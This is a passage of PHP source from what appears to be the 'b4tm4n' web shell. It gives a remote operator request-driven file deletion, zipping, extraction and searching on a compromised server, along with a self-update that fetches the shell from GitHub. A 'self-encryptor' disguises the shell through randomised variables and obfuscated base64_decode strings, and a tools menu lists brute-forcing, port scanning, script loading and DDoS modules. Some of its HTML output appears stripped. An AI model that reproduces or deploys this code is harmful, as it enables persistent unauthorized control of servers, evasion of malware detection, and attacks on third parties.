foreach($files as $file)
{
if(Remove($file))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
if($_REQUEST['action-option']=='zip')
{
if(end(explode(".",$newloc))=='zip')
{
$zip=new ZipArchive;
if ($zip->open($newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE)
{
foreach($files as $file)
{
if(is_dir($file))
{
$zip->addEmptyDir(basename($file));
$recur=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($file),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($recur as $key => $val)
{
if(basename($key)!="..")
{
if(is_dir($key))
{
$zdir=str_replace($file,basename($file),realpath($key));
$zip->addEmptyDir($zdir);
}
elseif(is_file($key))
{
$zfile=str_replace($file,basename($file),realpath($key));
$zip->addFile(realpath($key),$zfile);
}
}
}
}
elseif(is_file($file))
{
$zip->addFile($file,basename($file));
}
}
$zip->close();
print 'Zip Created';
}
else
{
print 'Failed';
}
}
else
{
print 'Extension must Zip';
}
}
if($_REQUEST['action-option']=='unzip')
{
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
if(end(explode(".",$file))=='zip')
{
$zip=new ZipArchive;
if ($zip->open($file)===TRUE)
{
$zip->extractTo($newloc);
$zip->close();
$succ++;
}
else
{
$fail++;
}
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
}
}
if($_REQUEST['x']=="find")
{
$recur=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($dir),
RecursiveIteratorIterator::LEAVES_ONLY
);
if(any('find-value',$_REQUEST)&&!empty($_REQUEST['find-value']))
{
$result="";
$res_=0;
foreach ($recur as $key => $val)
{
if(basename($key)!="..")
{
if(strpos(realpath($key),$_REQUEST['find-value'])!== false)
{
$result.=sprintf("
|
%s |
%s |
%s |
",
substr(realpath($key),0,strrpos(realpath($key),_)),
substr(realpath($key),0,strrpos(realpath($key),_)),
substr(realpath($key),0,strrpos(realpath($key),_)),
realpath($key),
realpath($key),
basename(realpath($key)),
GetFileTime(realpath($key),'modify')
);
$res_++;
}
}
}
printf("
No. |
Directory |
Name |
Modified |
%s
",$_REQUEST['find-value'],$_REQUEST['find-value'],$res_,$result);
}
else
{
print "
";
}
}
if($_REQUEST['x']=="update")
{
$link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php';
$current_version=2.6; //New Version Released
if($config['debug']==true)
{
$latest_version=$current_version+0.1; //Test Update latest version -/+ 0.1
}
else
{
$git_script=GetUrlContent($link_update);
$get_version=strpos($git_script,"current_version");
$version=substr($git_script,$get_version+16,3);
$latest_version=is_numeric($version)?$version:$current_version;
}
$status="";
if((float)$latest_version>(float)$current_version)
{
if($config['debug']==true)
{
$status.='New Version Available '.$latest_version.'
Setting Debug to False for Activate this Feature';
}
else
{
$status.='New Version Available '.$latest_version.'
Download -> [
link]';
}
}
else
{
$status.='Latest Version '.$current_version;
}
Printf("
%s
",$status);
}
if($_REQUEST['x']=="self-encryptor")
{
if($php_script=htmlentities(@file_get_contents(__FILE__)))
{
$asu=strpos($php_script,$_SESSION["action"]["password"]);
$temp=substr($php_script,$asu+48);
$rand="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(1,3));
$rand2="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(2,5));
$b64=array(
'"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"',
'strrev("ed"."oce"."d_4"."6es"."ab")',
'strrev("e"."doc"."ed_"."46e"."sab")',
'"b"."as"."e6"."4_"."d"."ec"."o"."de"',
'"ba"."se"."6"."4_d"."e"."cod"."e"'
);
$rand_b64=array_rand($b64);
$rand3=$b64[$rand_b64];
$var1=$rand.'="'.$_SESSION["action"]["username"].':'.$_SESSION["action"]["password"].'";';
$var2=$rand2.'='.$rand3.';';
$var=array(
$var1.$var2,
$var2.$var1
);
$rand_var=array_rand($var);
$rand4=$var[$rand_var];
$self=preg_replace("/\\\$x_/",$rand,$temp); // Change Variable $x_ to Random
$src_='';
$src_.='';
$name=!empty($_REQUEST['name'])?$_REQUEST['name']:'bat_encrypt.php';
$file=dirname(__FILE__)._.$name;
$op=fopen($file,'w+');
fwrite($op,$src_);
fclose($op);
printf("
SELF ENCRYPT CREATED !!!
Link -> %s
",GetUrlFromPath($file),$name);
}
else
{
print "
SELF ENCRYPT ENABLE !!!";
}
}
}
/* START CUSTOM TOOLZ */
if(any("z",$_REQUEST))
{
$z=$_REQUEST['z'];
print MenuTools(array(
"target-map"=>array("title"=>"Target Map","ver"=>"1.0","auth"=>"k4mpr3t"),
"port-scanner"=>array("title"=>"Scan Port","ver"=>"1.0","auth"=>"k4mpr3t"),
"script-loader"=>array("title"=>"Script Loader","ver"=>"1.0","auth"=>"k4mpr3t"),
"encryptor"=>array("title"=>"Encryptor","ver"=>"1.1","auth"=>"k4mpr3t"),
"form-bruteforces"=>array("title"=>"Form Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
"login-bruteforces"=>array("title"=>"Login Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
"mass-tools"=>array("title"=>"Mass Tools","ver"=>"1.0","auth"=>"k4mpr3t"),
"ddos-attack"=>array("title"=>"DDOS Attack","ver"=>"2.0","auth"=>"k4mpr3t"),
));
print "
";
}
/* END CUSTOM TOOLZ */
printf("